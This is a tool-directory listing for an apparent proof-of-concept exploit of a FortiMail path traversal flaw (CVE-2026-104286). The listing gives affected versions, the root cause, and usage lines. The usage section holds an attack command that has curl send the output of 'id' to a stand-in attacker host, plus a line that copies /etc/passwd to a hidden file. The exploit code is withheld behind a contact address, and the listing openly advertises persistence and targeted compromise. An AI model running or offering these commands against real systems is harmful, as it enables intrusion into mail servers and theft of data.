Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-104286-POC — Unauthenticated path traversal exploit for CVE-2026-104286 in FortiMail, writing arbitrary files via crafted HTTP/HTTPS requests for red team assessment and persistence. | Kitploit
Tools/GitHubGitHub/shadowforge-cyber/cve-2026-104286-poc
Persistence MechanismsVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingRed TeamingPayload Development

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
GitHub
shadowforge-cyber/cve-2026-104286-poc

CVE-2026-104286-POC

Unauthenticated path traversal exploit for CVE-2026-104286 in FortiMail, writing arbitrary files via crafted HTTP/HTTPS requests for red team assessment and persistence.

View Repository
1 day agoNot yet reviewed
Share

FortiMail CVE-2026-104286 Path Traversal Exploit

Overview

Advanced unauthenticated remote arbitrary file write exploit for CVE-2026-104286 in FortiMail. Crafted HTTP/HTTPS requests bypass path sanitization in the web client, enabling arbitrary file creation on the underlying OS. Used for red team assessment, persistence implants, and targeted compromise of FortiMail deployments.

Affected Versions

FortiMail 8.0.x (<8.0.2), 7.6.x (<7.6.6), 7.4.x (<7.4.8), 7.2.x (<7.2.9), 7.0.x (<7.0.10)

Root Cause

Improper limitation of a pathname to a restricted directory (CWE-22). No validation of ../ sequences in file upload paths within the HTTP/HTTPS API handlers, allowing traversal outside the intended upload directory.

Usage

$ python3 cve-2026-104286.py -u http://target:443 -c "curl -s http://attacker:80/$(id)"
$ python3 cve-2026-104286.py -u http://target:443 -l /etc/passwd -o /var/tmp/.hacked
image

Exploit

Contact for exploit: [email protected]

Download Tool